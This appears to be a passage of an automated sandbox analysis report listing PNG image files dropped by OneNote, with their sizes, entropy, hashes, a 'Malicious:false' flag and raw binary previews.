                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
